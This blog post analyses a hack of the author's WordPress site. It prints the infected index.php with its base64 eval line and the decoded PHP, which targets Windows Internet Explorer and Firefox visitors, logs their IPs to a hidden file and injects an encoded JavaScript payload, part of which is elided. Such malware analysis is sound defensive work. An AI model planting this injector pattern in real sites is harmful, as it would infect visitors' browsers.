As I wrote yesterday, someone hacked the Irreal WordPress installation causing it to inject JavaScript into pages served by the blog. Here’s a copy of the hacked index.php file:
<?php eval(base64_decode('JGlwPSRfU0VSVkVS /* elided */ );?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
Importing that file into Emacs and using the base64-decode-region function, that first line turns out to be
<?php
eval(base64_decode('$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua
= $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip)
=== false)){ error_reporting(0);
echo(base64_decode('PHNjcmlwdD50cnl7MS1wcm90b3R5 /* elided */ ); if
($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} }'));?>
I’m not a PHP or JavaScript programmer so I had to bootstrap my knowledge of C to figure out what’s going on. As you can see, the code checks to see if it’s running on a Windows machine that is using either Internet Explorer or Firefox and also makes a check on the file contents that I don’t understand. If those checks pass, it echos the payload onto the page. Notice that new call to base64_decode. When it’s decoded it expands to some byte-compiled JavaScript. I didn’t bother decompiling it because, as I say, I’m not a JS programmer and would only have a vague notion of what it was doing.
All of this was pretty easy to figure out once I got the index.php file into Emacs. As usual, it had all the tools I needed. I’m beginning to think that there might be something to the old joke that Emacs is not an editor, it’s an operating system.